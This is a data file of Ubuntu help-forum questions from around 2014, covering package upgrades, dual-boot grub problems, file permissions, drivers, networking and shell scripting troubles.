462888	apt-get update/upgrade not finding latest version of percona server	i 've got percona db 5.6 on several 12.04 servers . on a few of them , i 've been able to successfully upgrade to the latest version ( 5.6.17 ) using apt-get update apt-get upgrade on several others , apt-get update + upgrade tells me there 's nothing to do . why is n't it finding the most recent version ? up-to-date version from servers that did update : `` server version : 5.6.17-65.0-587.precise-log ( ubuntu ) '' version from servers that are not updating : `` server version : 5.6.15-63.0-log percona server ( gpl ) , release 63.0 '' i have confirmed that the following lines are in /etc/apt/sources.list on all servers : deb http : //repo.percona.com/apt precise main deb-src http : //repo.percona.com/apt precise main ( and it had to work at some point , because they were all installed originally using apt-get )
462889	listing permissions	i 'm a biomedical scientist and i 'm having trouble running a custom data analysis pipeline written by one of our collaborators . his script crashes with /bin/sh : 1 : /usr/local/bin/fastqc/fastqc_v0.10.1 : permission denied make [ 2 ] : *** [ /home/kat/gentrap.git/gentrap_out/1_bira_taaggcgagagtag_r1.fastqc ] error 1 make [ 2 ] : leaving directory `/home/kat' thing is , i 've already made myself the owner of /usr/local/bin/fastqc ( sudo chown -r user : user /usr/local/bin/fastqc ) and given myself read/write/executable permissions ( sudo chmod -r +rwx /usr/local/bin/fastqc ) . i tried listing permissions with ls -la and i 'm a little confused by the output : drwxr-xr-x 3 kat kat 4096 mei 8 14:20 . drwxr-xr-x 5 root root 4096 mei 8 14:20 .. drwxr-xr-x 7 kat kat 4096 mei 8 14:20 fastqc_v0.10.1 as i understand it , that means i 'm the owner of the current directory and the subdirectory fastqc_v0.10.1 , and i should have all the permissions . root is the owner of the parent directory , which would be /usr/local/bin . am i reading this output correctly ? why would the script be crashing due to insufficient permissions ?
462890	booting sequence in dual boot environment - windows 7 + ubuntu 12.04	until recently , i was able to progress without a problem in a single hard drive windows 7 / ubuntu 12.04 dual boot environment . the boot menu would prompt whether one wanted to load windows 7 or ubuntu 12.04 , with the default being windows 7 ; this was possible by manipulating the boot menu using easybcd 's tool . if one were to select the ubuntu 12.04 option , it would take one to grub from where ubuntu 12.04 was loaded . while fidgeting with something , i had to update grub with 'update-grub ' command and now the booting sequence is reversed . on booting the computer , i now get the grub screen ( with the default being ubuntu 12.04 ) and if on selecting the windows 7 option there manually , i get the original boot menu of either windows 7 or ubuntu 12.04 . being a bit geeky , i can handle this ; however , the girlfriend is confused with the various turns and selections . how do i reset to the orginal state of the boot menu offering windows 7 / ubuntu 12.04 , with windows 7 as the default option ? i can not set the grub timeout to '0 ' as ubuntu 12.04 would be selected by default , something i do not want . a possible option would be to push windows 7 to the top of grub 's list but this would still mean the the booting sequence would be grub -- > windows 7 to load windows 7 . is there a remedy to bring back the original state of the boot menu offering windows 7 / ubuntu 12.04 , with windows 7 as the default option ? a2mail .
462892	error during upgrading from 12.04 to 12.10	w : failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_quantal_main_i18n_translation-en e : some index files failed to download . they have been ignored , or old ones used instead .
462893	saucy : boost shared libs contain no symbols	i need to link with some of boost 's shared library ( .so ) files . i have installed boost by running sudo apt-get install libboost-all-dev the header files and static libraries are installed correctly . the shared libraries are also installed however they contain no symbols . nm /usr/lib/x86_64-linux-gnu/libboost_filesystem.so nm : /usr/lib/x86_64-linux-gnu/libboost_filesystem.so : no symbols how is this possible and how can i fix it ? i understand that this is a vague issue , but i have tried apt-get clean and completely removing and purging all boost debian packages and reinstalling and i always get the same result . compiling boost from source and installing a separate version is not ideal .
462898	rabbit vcs is not getting installed . ubuntu 12.04	i tried to install rabbit svn following this link . i tried all the other links that i got after googling . rabbit vcs when i run the third command i am getting the message that rabbit vcs is already the newest version . when i right click on the folders the rabbit vcs option is not showing up . shanavas @ shanavas-dell-system-inspiron-n4110 : ~ $ sudo apt-get install rabbitvcs-nautilus3 reading package lists ... done building dependency tree reading state information ... done rabbitvcs-nautilus3 is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded .
462899	trying to configure wireless	absolute linux beginner here , working with lubuntu : when i enter lspci -v | grep -ia 7 network in the terminal , i get nothing at all . it just returns me to the prompt . i have a wireless card installed , and also a usb wireless adapter ( not currently connected ) . it does n't matter if the usb is connected or not , i get the same response . am i missing something very basic here ?
462900	ca n't open any disk after installing ubuntu 14.04	error mounting /dev/sda8 at /media/eyad/6e4ca94c4ca90fbf : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda8 '' `` /media/eyad/6e4ca94c4ca90fbf '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda8 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option .
462902	ubuntu gnome 14.04 : boot hangs just before login screen	i installed ubuntu gnome and did a lot of system configurations and installed all my programmes . now once of a sudden the booting sequence hangs just before the login screen . if i hit ctrl + alt + backspace i will get to the login screen . however , login just ends with a black screen and the desktop does not show . i looked into http : //askubuntu.com/a/223634 . accessed the terminal via ctrl+alt+f3 and tried the following : ls -lah does not show .xauthority ls -ld /tmp seems to be okay regarding writing rights dpkg-reconfigure gdm did not show any results even after killing x and login in , i can find .xsession-errors can you help me to debug this issue ? thanks . xorg.0.log output : http : //paste.ubuntu.com/7418243/ one line says : [ 337.141 ] setversion 1.4 failed : permission denied does that hint to anything ?
462903	multiple monitor issue with gnome 3.10 running ubuntu 14.04 lts	i did a fresh install of ubuntu 14.04 and installed gnome shell . when i enter display setting everything seems to work fine , that is until the next log off or reboot . for some reason the settings ( ~/.config/monitors.xml ) does n't load correctly , and i 've have to reposition the monitors every time . i 've tried both gdm and lightdm but the issue remains on both . any suggestions on how i can fix this ?
462905	aptitude showing error during installation	i want to install `` aptitude '' but it gives me the following error : e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
462906	how do i lock the desktop screen via command line on ubuntu 14.04 ?	gnome-screensaver is not being used anymore in 14.04 ( ( ( ( how do i lock the desktop screen via command line on ubuntu 14.04 ? please
462910	grub / os-prober does n't see windows 8.1 partition	i have a 1 tb hdd with seven partitions , one ~600gb for windows and one ~300gb for xubuntu and a bunch of assorted system partitions taking the rest of the space . i recently overwrote my xubuntu partition with a fresh install since i messed it up somehow , and this is where my problem starts . before , grub would show up at boot asking me to boot into either xubuntu or windows . after the reinstall this does not happen anymore . i 've tried running os-prober , but it just does nothing and outputs nothing . update-grub shows my linux partitions alright but does n't mention windows at all . here 's my layout ( parted -l ) : model : ata st1000dm003-1ch1 ( scsi ) disk /dev/sda : 1000gb sector size ( logical/physical ) : 512b/4096b partition table : gpt number start end size file system name flags 1 1049kb 525mb 524mb fat16 efi system partition boot 2 528mb 570mb 41.9mb fat32 basic data partition hidden 3 570mb 705mb 134mb microsoft reserved partition msftres 4 705mb 2852mb 2147mb ntfs basic data partition hidden , diag 5 2852mb 632gb 629gb ntfs basic data partition msftdata 7 632gb 994gb 362gb ext4 boot 6 994gb 1000gb 6093mb ntfs microsoft recovery partition hidden , diag os-prober output ( just hangs there for a second and does n't say anything ) : marvin @ ttyfsck : ~ $ sudo os-prober marvin @ ttyfsck : ~ $ update-grub output : marvin @ ttyfsck : ~ $ sudo update-grub generating grub configuration file ... warning : setting grub_timeout to a non-zero value when grub_hidden_timeout is set is no longer supported . found linux image : /boot/vmlinuz-3.13.0-24-generic found initrd image : /boot/initrd.img-3.13.0-24-generic adding boot menu entry for efi firmware configuration done fdisk -l output : marvin @ ttyfsck : ~ $ sudo fdisk -l warning : gpt ( guid partition table ) detected on '/dev/sda ' ! the util fdisk does n't support gpt . use gnu parted . disk /dev/sda : 1000.2 gb , 1000204886016 bytes 255 heads , 63 sectors/track , 121601 cylinders , total 1953525168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x314b8de1 device boot start end blocks id system /dev/sda1 1 1953525167 976762583+ ee gpt partition 1 does not start on physical sector boundary . boot-info ( long ) : http : //paste.ubuntu.com/7416627/ specs ( again ) : xubuntu 14.04 windows 8.1 1 tb hdd edit : i can mount my windows partition and view the contents no problem .
462913	lubuntu 14.04 sylpheed email retrieves old deleted mail	just installed lubuntu 14.04 on a dell dimension 4700 . on sylpheed email when i retrieve mail it retrieves old deleted email from more than two ( 2 ) years ago . is there a particular way to set it to where it wo n't retrieve old deleted mail ? thank you !
462914	how to reinstall unity desktop on ubuntu 14.04	i 've installed gnome desktop and now i do n't have unity desktop . how can i reinstall it ?
462915	documentroot takes one argument , root directory of the document tree action 'configtest ' failed	having some issues with ubuntu development setup . i am getting the error : ***ah00526 : syntax error on line 6 of /etc/apache2/sites-enabled/magento-dev.local.conf : documentroot takes one argument , root directory of the document tree action 'configtest ' failed . *** here is the file with syntax error on line 6 . i get this error after i enable the site and trying to restart apache . can anyone point out what i could be missing . < virtualhost *:80 > # servername ( domain ) and admin email serveradmin webmaster @ magento-dev.local servername magento-dev.local documentroot /var/www/magento-dev.local/public # folder of the site . we have to create this # log file locations loglevel warn errorlog /var/log/apache2/magento-dev.error.log customlog /var/log/apache2/magento-dev.access.log combined < /virtualhost >
462918	ubuntu server connecting to l2tp vpn	i am trying to connect to a vpn from my ubuntu 14.04lts server . this is a fresh install . i cant seem to find a guide on how to connect to the vpn from the command line . any help would be appreciated .
462924	checking if a bug was fixed	how could i check if an issue was fixed with past updates ? actually im looking for bug related with wireless ca n't connect after suspend mode in ubuntu 14.04 . at this moment i disabled all power management options to prevent it .
462927	lubuntu installation	i 'm new to ubuntu , and so far i love it . i 've done a couple of installs of ubuntu 12.04 lts on some old computers from a livecd a coworker gave me . i 'm now interested in upgrading my network , including a gateway lt4010u netbook with intel atom n2600 processor and 4gb of ram , and 320gb hard drive . i would like to install lubuntu 14.04 lts on this machine . my question is : is it possible to install the 64-bit intel/amd64 version , or is the atom really a 32-bit processor ? i intend to make a bootable usb stick for the install . thanks in advance for any help you can give . p.s . no hurry . ubuntu 12.04 lts works just fine for now . i wonder why it only sees 2.91 gb of the 4 gb memory stick , though ... .
462932	problem installing xampp	i want to install xampp on my ubuntu 14.04 lts . i am new to ubuntu and most of the times its easy but now i do n't understand a thing . first i tried this tutuorial but on step 2 i got this in the terminal : chmod : can not access ‘xampp-linux-x64-1.8.3-2-installer.run’ : no such file or directory so i tried to download and install it from apachefriends.org downloading was not a problem but installing it was . i followed the steps in the faq which was also a fail , after pasting the code in the terminal i got this : chmod : can not access ‘xampp-linux-*-installer.run’ : no such file or directory so , i hope someone here can tell me what i am doing wrong . ( most of the times its me doing it wrong ) i used xampp on windows and it always worked for me so it was my first choice here . if there are others that work better let me know . over to you
462937	guitarbots - firefox/wine - unitywebplayer	i 've been trying to use unity web player in this website : guitarbots.com . i 'm running mozilla firefox 29.0 in wine 1.6.1 . after i installed the unity plugin i got this error message . i'v been looking for a way to fix it but nothig seems to work well . additionally i 'm not sure how to remove the plugin after is intalled in order to install a different one . thanks .
462941	tar restore from tape fails	i have a basic backup to tape script and restore script that was written by a previous admin . when trying to restore from tape , i get the following error : tar : v : can not open : no such file or directory tar : error is not recoverable : exiting now i have tried running the commands manually to enter in the restore path : tar -xfv /dev/st0 /srv i have also tried restoring to alternate paths , all which give the same error message . below are the backup and restore scripts . any help identifying what my issue is would be greatly appreciated . here is the backup script : echo starting backup to tape at `date` mt -f /dev/st0 rewind tar cfv /dev/st0 /srv mt -f /dev/st0 eject echo backup to tape complete at `date` exit here is the restore script : echo -n starting restore from tape at `date` to directory : `pwd` mt -f /dev/st0 rewind tar -xfv /dev/st0 echo restore from backup complete at `date` exit
462942	lubuntu graphical bugs	i 've been installed lubuntu in desktop and after `` upgrade '' some graphical/theme bugs appeared . example screenshot :
462946	how to modify the details of a debian package	i am new to ubuntu and would like to know if there 's a way to modify or edit the details of a deb package . for example , i 'm running the command : sudo dpkg -i mypackage_amd64.deb and get several categories , such as version , architecture , section , etc.. how can i remove or change the values of one or more of these categories ? thanks very much .
462948	can not switch to amd proprietary driver	iâm using ubuntu 14.04 on hp probook 4730s with amd hd 6400m gpu . i have some problems with proprietary\opensource amd driver in different games . so i have to switch between drivers to play a particular game i 'm switching in system settings - > software & updates - > additional drivers but for some reason its not changing any more . it says `` 1 proprietary driver in use '' but it uses opensource driver i tried to fully uninstall & install fglrx driver - no effect . aticonfig -- initial says that no supported gpu found lspci : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 01:00.0 vga compatible controller : advanced micro devices , inc. [ amd/ati ] seymour [ radeon hd 6400m/7400m series ] ( rev ff ) and amd says that is supported if i try to install latest driver from amd site it fails with same error your graphics adapter is not supported by this driver how can i finally get it work ?
462951	computer suddenly becomes unresponsive ( via keyboard , mouse ) 12.04.4 lts	recently , shortly after one of the myriad prompted update sessions , i have experienced an unpredictable ( unpredictable in it 's timing , but predictable in the certainty that it will occur again sometime ) issue . no matter the application ( i.e . there is no one site or function that precipitates the problem ) , the computer will suddenly freeze . mind you , the computer does not lose power.. not so much as a wobble.. and even media such as youtube , bbc radio , etc . continue playing . the mouse is able to reposition the cursor easily - just ca n't select any icons or enter any text with it . the keyboard just totally bails . no combinations of ctrl + alt + del or anything have any effect because , as mentioned , the keyboard is immediately removed from the equation and becomes redundant . my only recourse thus far had been a forced shut-down , after which ( upon re-booting ) the computer functions flawlessly until the next such incident.. and the dance begins anew . i do n't wish to use a forced shut-down and reboot as part of my daily computing routine - and i know continuing to do so will result in a `` does n't end well '' scenario . is there a known issue involving ubuntu 12.04 regarding this type of `` freeze '' ? and if there is , what is the prescribed method of resolving it ? what are your thoughts to this.. or should i just go through the process of reinstalling the software ( or even upgrade to ver . 14.04 ) if this particular one has somehow become corrupt . many thanks . ps - problem manifests itself using both ( either ) the firefox and chrome browsers .
462954	unable to add windows 7 pc as client to samba4 ad dc	i 'm new to networking . i 'm trying to set up a network at my office which consists of about 15 windows 7 pcs in the lab . this worked perfectly when i tried with windows server ( evaluation version ) . i 'm now trying to set up a server in ubuntu using samba4 . i followed all the steps in this tutorial : how to install samba 4 as an active directory domain controller i 'm using ubuntu 14.04 . there was no error in setting up the server until the last step of the tutorial . when i tried to add my windows 7 pc to the domain it 's not detecting the server . i have turned off my isp modem/router which has dhcp enabled on it and restarted everything . when i do ipconfig from the windows pc it 's not showing the domain name in the dns suffix . i added my server 's ip address to ipv4 properties to obtain ip address . i am not even able to ping the server . the error message i 'm getting is ping : transmit failed . general failure tried flushdns , release , and renew , and even restarted pc . how do i check if my server is an active dhcp server ? also , how can i fix this issue ? please help me .
462955	error in boot repair after installing ubuntu 14.04 alongside windows 8.1	i`ve installed ubuntu 14 in my note following instructions from some tutorials in the internet , i had to enable legacy mode to boot from pen drive . basically , i created the following 4 partitions in an empty space in my disk : / /home /boot /swap after finishing the installation , i did n't see any option to choose the so , instead windows starts automatically . as recommede fot the many tutorials available in the internet i performed boot repair , but after have done the recomended repair , it appears a pop up with an error message and a text file . the error message says : an error occurred during the repair . a new file ( ~/boot-info_2014-05-08__11h39.txt ) will open in your text viewer . in case you still experience boot problem , indicate its content to : boot.repair @ gmail.com you can now reboot your computer . you may want to retry after deactivating the [ backup and rename windows efi files ] option . the boot of your pc is in legacy mode . you may want to retry after changing it to efi mode . the text file is this : https : //www.dropbox.com/s/d004da42g6adv19/boot-info_2014-05-08__11h39.txt my pc configuration dell inspiron 14z core i5 8gb ddr3 500gb / 32 gb sata windows 8.1
462956	only analog output for usb headset on 14.04 available . how can i use digital output/ why can i not use digital output ?	i previously used 12.04 where i was able to use digital output for my usb headset and it worked miles better than analog . now i installed ( fresh install , deleted previous ubuntu partitions ) 14.04 on the same computer and can only select analog output , where the volume control is comparably bad . edit : i am using the default volume control for ubuntu 14.04 ( 64-bit ) and my headset is the plantronics gamecom 780 . the only ( not obvious ) difference between my old 12.04 install and my new 14.04 install is that i do not have a /boot partition anymore on 14.04 .
462957	ubuntu kubuntu mixed desktop	i have the kubunntu desktop running and added the ubuntu desktop because i like unity more . my problem is that some how icons in ubuntu unity showed up from kubuntu . i have these in ubuntu : http : //i.imgur.com/ru98y.jpg for example the folders are blu like in kubuntu and not orange . also some menus have very dark colours so it is hard to read . thats why i tried to uninstall kubuntu but it wont work with sudo apt-get autoremove kubuntu-desktop sudo apt-get -- purge autoremove kubuntu-desktop the answer is package 'kubuntu-desktop ' is not installed , so not removed
462958	twinkle not opening after installation	i am running xubuntu 14.04 and i installed twinkle from the software center . when i try to open twinkle from the whisker menu nothing happens , no window appears at all . when i try opening from terminal by typing `` twinkle '' i get the message `` critical : can not open file for reading : /home/marco/.twinkle/twinkle.cfg '' i was running twinkle on ubuntu 12.10 without problems . basically i just need a softphone that i can use with a diamondcard.us account . how can i get twinkle ( or other softphone ) running successfully again ?
462959	unable to use files with special characters in shell	i want to loop through a directory and for every file that is not a directory , i want to append the names together and separate them by comma . files= '' '' for f in $ ( ls ~/downloads | grep -v ^d ) do files+= '' $ f '' '' , '' done echo `` $ files '' here the downloads folder has files like this : 01 - agar mujhse mohabbat hai - www.downloadming.com.mp3 expected output : 01 - agar mujhse mohabbat hai - www.downloadming.com.mp3 actual output : 01 , - , agar , mujhse , mohabbat , hai , - , www.downloadming.com.mp3 i tried many things but no help.can anyone post a solution that would be great .
462960	how to recover data from overwritten ntfs partition ?	i downloaded ubuntu 14.04 and installed it via a bootable usb drive . i wanted dual-boot for windows and linux . i already had installed windows 8 in c : partition . now i installed ubuntu in d : partition ( with f : partition as swap area ) i 'm unable to access d : and f : drives from windows . what do i do now ? i have my very important files in f : drive . how to recover or access it ? please help me . thanks : )
462961	what is unicode virtual console ?	when i press ctrl+alt+f1 then enter the terminal . i want to input cjk ( chinese , japanese , korean ) here . this called unicode virtual console/terminal ( according to the wiki ) . what is unicode virtual console in detail ? how can i input cjk ?
462964	use nut 2.7.1 in ubuntu server 12.04	i have questions in regards to using a different version of nut than what is available through apt-get for ubuntu server 12.04 . the version of nut that is available in ubuntu server 12.04 is 2.6.3 . unfortunately for me , the driver for my ups was not added to nut until version 2.7.1 , which is what is available for nut on ubuntu 14.04 . i want to know if someone either knows of a place i can find a step-by-step guide for compiling and installing this particular version of nut on ubuntu server 12.04 , or if someone can walk me through it . i 've tried several times with no success . i think my biggest questions right now is where in the file structure should i put my downloaded tar , where should i extract it , and where should i compile and install it ? do i need to be in a particular directory when i do any of this , or does ubuntu `` just know '' what to do with it when i am compiling and installing . or , is there an easy way to just add the required information for my ups into nut so it will be recognized by nut 2.6.3 . hardware information : server is custom built using asus p8b-x motherboard . graphics driver for motherboard had to be installed ( ast 2050 driver i believe ) . 32gb server ram . e3-1230v2 processor . os is on a 32gb flash drive . virtual machines are stored on another 16gb flash drive ( both flash drives are installed directly on motherboard usb headers ) . two vms run freenas . these vms mount up access to the seagate 2tb nas hdds in the system ( 6 total currently ) . all of this is tucked away in a rosewell 4u case . everything is integrated into a windows domain and everything works as expected with the exception of communication with the ups ( tripp-lite smart1500lcdxl ) . additional non-essential information : i have tested my ups with ubuntu 14.04 ( both server and desktop versions ) and nut 2.7.1 and it works as expected . however there lies my dilemma . the server that is running 12.04 has lot of configurations done to it , many of which i do n't remember doing or do n't remember how i did it . i can say that the server is running exactly how i want it to without upgrading the distro to 14.04 . i did test upgrading from 12.04 to 14.04 on my server 's hardware by using a different flash drive and receive an error in regards to possible issues with the install related to the graphics driver that is required by my motherboard . i know there are security risks to having a gui installed on a server , but given the environment i think it is okay ; it is behind a firewall and no part of it is exposed outside the internal network , plus i do n't necessarily need a gui , but it does make some things for me easier like managing vms . all i really care about is gracefully shutting down the vms during a power outage . freebsd and freenas do not recognize the ups either . my thoughts were to have ubuntu receive the shutdown command as the vms go up and down gracefully with the system ; they are receiving power up and shut down commands from ubuntu already .
462966	getting flash working with amd-processor ubuntu 12.04 machine	i have been having major issues trying to get flash working on my desktop computer running ubuntu 12.04 . after trying several things and wading through several webpages/forums on the issue , i found out that my problems are a result of my computer having an amd processor , which can not process certain commands/features ( sse2 ) that the current version of flash uses . the posted solution for this is to manually roll-back/install an older version of flash which should work ( e.g. , 11.1 ) : you have to download the appropriate package , extract the libflashplayer.so file , and place it in usr/lib/mozilla/plugins . however , i 've tried this and i 'm still having no luck ... is there something else i need to do ? thanks in advance !
462968	take changes in file sshd_config file without server reboot	i change configuration in file /etc/ssh/sshd_config but got effect only after reboot server . how to take changes without rebooting server ?
462973	ubuntu 14.04 virtualbox guest usb drive mounting works for some devices but not others	i have a virtualbox ubuntu guest running on a osx host . i 've searched the web and implemented the solution for similar problems , but nothing has helped me resolve my issue . when i connect my phone , ubuntu mounts the device automatically . when i connect my usb drive ( kanguru ss3 32gb ) , it does not mount the drive . i 'm only using one processor for my vm settings . virtualbox has the device available and selected under the `` usb devices '' menu , but the /media/ folder is empty and the drive does not automount . so i do n't know what to do at this point . seems like overkill but should i uninstall/reinstall virtualbox ? why would the guest os mount one usb device , but not the other ?
462977	does anyone got the citrix receiver running on ubuntu 14.04 64 ?	i have installed the citrix receiver 13.0.0.256735 as described for ubuntu 13.10 here : citrixicaclienthowto the installation has succeded under ubuntu 14.04 64 bit . but if i start the citrix receiver nothing happens . is there someone who has it running with ubuntu 14.04 ?
462980	create node -maas ( power off )	i am trying to add nodes in the maas . when i add the node from pxe , the computer shuts down ( power off ) and it appears as accepted . but even if the wake on lan type , nothing happens after and the node continues as offline . what should i do ?
462981	ldap client change unix and samba password	i have to work in a mixed windows/linux world as far as desktop clients are concerned . i 've got a central openldap server with samba3 that serves a fake windows domain which keeps the windows guys happy . i 've then set up the ubuntu clients to authenticate via ldap which keeps them happy . heres where i 'm falling over , on windows if a user changes their password the unix and samba passwords get updated . great . on ubuntu , only the unix password gets updated so next time they use a windows machine they ca n't log in/have to use their old password . what is the preferred solution to updating both passwords ? should i just install likewise-open on ubuntu and make it join the fake windows domain ? it just seems odd to my mind to make an ubuntu server pretend to be a windows server so that an ubuntu client can pretend to be a windows client logging into an ubuntu server pretending to be a windows server . any info would be appreciated .
462982	qml : how do i set my icon in the ubuntu sdk with a cmakelists based project ?	how do i set my icon in the ubuntu sdk with a cmakelists based project ? do i need a specific type of image file , or can i use just a png ?
462983	release upgrade fails	running on 13.10 and trying to make a release upgrade but getting this : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/trusty/release unable to find expected entry 'main/binary-ia386/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //archive.canonical.com/ubuntu/dists/trusty/release unable to find expected entry 'partner/binary-ia386/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //security.ubuntu.com/ubuntu/dists/trusty-security/release unable to find expected entry 'main/binary-ia386/packages ' in release file ( wrong sources.list entry or malformed file ) , w : failed to fetch http : //us.archive.ubuntu.com/ubuntu/dists/trusty/release unable to find expected entry 'main/binary-ia386/packages ' in release file ( wrong sources.list entry or malformed file ) any hints how to resolve it ?
462988	password problem with ubuntu ( virtual machine )	i have ubuntu installed as a vmware guest . i am having difficulty logging in ; i remember password , but it is saying my password is incorrect . please help me to recover the password for root .
462990	libre office ca n't access windows partition	in lubuntu , libre office ca n't open any files from my c partition ( dual boot with windows xp ) . abiword on the other hand , does do the trick . xnview and vlc player have the same problem . how is this possible and is there a fix ? thanks !
462991	startup script locks up ubuntu 14.04	i ran ubuntu 13.10 with a startup script that had three xrandr commands in it to add a screen resolution that ubuntu could n't detect . after upgrading to ubuntu 14.04 , the system freezes on startup . all i can do is enter terminal mode and type commands . i think the problem is in the startup script . how do i disable my startup script from the command line ? i tried deleting the original shell file but apparently ubuntu copied the file elsewhere when i defined it as one of my startup scripts , and the system still freezes on startup .
462993	trouble with resolv.conf	i recently tried to delete unodns from my laptop . a member of their team gave me some commands to input in a terminal . it looked like it changed the nameserver address back to 8.8.8.8 . but after i restarted my laptop i cant connect to internet at all . i am using ubuntu 14.04 . please help .
462994	how to install alcatel 's one touch ( l100 ) 4g modem in a ubuntu 14.04 ?	i 've tried using alcatel 's one touch 4g usb modem on a newly installed ubuntu 14.04 , but with no luck . the carrier is portugal 's optimus kanguru . following suggestions online , i 've installed usb-modeswitch , usb-modeswitch-data , wvdial and comgt . when i plug it in , networkmanager 's applet adds the option to enable mobile broadband . i enable it , but when i try to create a new connection , the combo box has no devices in it . only the `` any device '' option . i set it up anyway with a multitude of all possible apn 's i could find ( incl . none ) but when i try to connect , it immediately fails . following instructions online , i 've also attempted to connect with wvdial , by running : sudo wvdialconf sudo wvdial with the following result : sending : atdt*99 # waiting for carrier . timed out while dialing . trying again . sending : atdt*99 # waiting for carrier . timed out while dialing . trying again . ( and so on ... ) i also tried using different apns in /etc/wvdial.conf to no avail . lsusb shows the device as : bus 001 device 010 : id 1bbb:011e t & a mobile phones usb-devices shows this : t : bus=02 lev=02 prnt=02 port=01 cnt=01 dev # = 9 spd=480 mxch= 0 d : ver= 2.00 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1bbb prodid=011e rev=00.00 s : manufacturer=usbmodem s : product=mobile broad band c : # ifs= 5 cfg # = 1 atr=e0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 2 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage i : if # = 3 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 4 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=qmi_wwan
462996	problem with double click on title bar or right click on it or any window washed out and disappear in ubuntu 14.04	i run over the following problem in ubuntu 14.04 : when i right click , or double click title bar of a nautilus , or at any opened window , or any browser window and so on , it shade and disappear . image is an example of behavior of terminal window when right/double clicked : in the previous ubuntu versions ( 13.10 ) when a title bar right-click cause the menu to pop-up . appears a sub-menu with options to move the window around work spaces and few more choices . now i can not find this menu , and this option can be reached only with shortcut keys . i wold be glad to have a hint of that issue .
462998	ubuntu server 14.04 - broken dependancies for clam av	tried to install clamav via command line for ubuntu server 14.04 . got the following error : groot : /home/carlo # apt-get install clamav-freshclam reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help resolve the situation : the following packages have unmet dependencies : clamav-freshclam : depends : clamav-base ( > = 0.98.1+dfsg-4ubuntu1.1 ) but 0.98.1+dfsg-4ubuntu1 is to be installed e : unable to correct problems , you have held broken packages . i have tried to install it via the apt-get install -f command , but get the same error . outside of building from source is there a solution ?
463001	failed to delete files on my ext4 partition	after upgrading from 12.04 to 14.04 , a new partion was created . i can mount it but not able to delete or move files . how can i fully access it ?
463006	curl request from cron job is not working , but works manually	i have a cron job that runs every minute and makes a curl request and i have verified that using grep on the syslogs . but the curl is not happening somehow and moreover i have a small echo statement in the cron that i log in some file.even that log is not printing but manually when run my shell file it works . can someone help me out in this. ? update : this is the shell file i am using # this file sends the changed files to our server # var= $ ( ls ~/downloads | grep -v `` ^d '' ) # files= '' '' # for f in $ ( ls ~/ourdrive | grep -v ^d ) # do # # files+= '' $ f '' '' , '' # # done files= ( ) cd /home/user/ourdrive for file in * ; do [ [ -d $ file ] ] & & continue files+= ( `` $ file '' ) done comma_separated= $ ( ifs= , ; echo `` $ { files [ * ] } '' ) echo `` $ comma_separated '' curl -- data `` file_list= $ comma_separated & username= $ { user } '' http : //localhost:8084/url/add.do echo `` done '' > /home/user/desktop/log.txt
463007	ubutnu 14.04 installation issue - keyboard and mouse not working	after installing the new ubuntu version 14.04 lts , the keyboard and mouse are not working . i have ubuntu 10.10 installed and i want to update to the last version ( 14.04 ) , so i installed the new version in a new hard disk . during installation the keyboard and mouse worked fine , after reboot the keyboard and mouse did n't work anymore . if i try to unplug any of them and then i reconnect them , sometimes the system halts . i have a motherboard ecs c51gm-m , and the keyboard and mouse are ps/2 . it 's important to mention that in ubuntu version 10.10 , all still works fine . finally , i want to clarify that i 'm new in ubuntu , i have n't installed the previous version . thanks for the help
463010	ubuntu initiallisation	i have a problem with ubuntu 14.04 , but i donâ´t know too much about computers . two days ago , i updated my version of ubuntu 12.04 to 14.04 and today , i tried to enter with my username and my password . so far , no error message until here , everything is [ ok ] . then , the screen turns black for two seconds and returns to the previous page and asks me to type again my password . why does it happen ? is there anyway of solving this problem without reinstalling ubuntu ?
463011	how to make xrandr permanent ?	i have a second monitor which was getting a low resolution at start up . using xandr i am able to add the proper resolution ( 1360x768 ) . how do i make it permanent ? i saw another post about this , but it was n't exactly the same . thanks for any info .
463012	how can i create a wget gui with multiple progress bars ?	i 'm writing my own script to download multiple items ( simultaneously , one item per command ) using wget and i need a progress bar . i currently utilize zenity -- progress for my progress bars , but the problem is it spawns multiple progress bars when downloading . what i want to achieve is something similar to the file transfer dialog in nautilus : can anyone point me to the right direction as to which program ( s ) or language ( s ) that will achieve this . note : i only have basic knowledge of shell scripting , not much else .
463013	reset post grub splash screen with default	i installed ubuntu-gnome but was not a least bit impressed so decided to revert back to unity . however post grub ( after selecting ubuntu ) there is a gnome splash screen . how to i revert back to the original purple ubuntu ... splash screen ? i am using 14.04
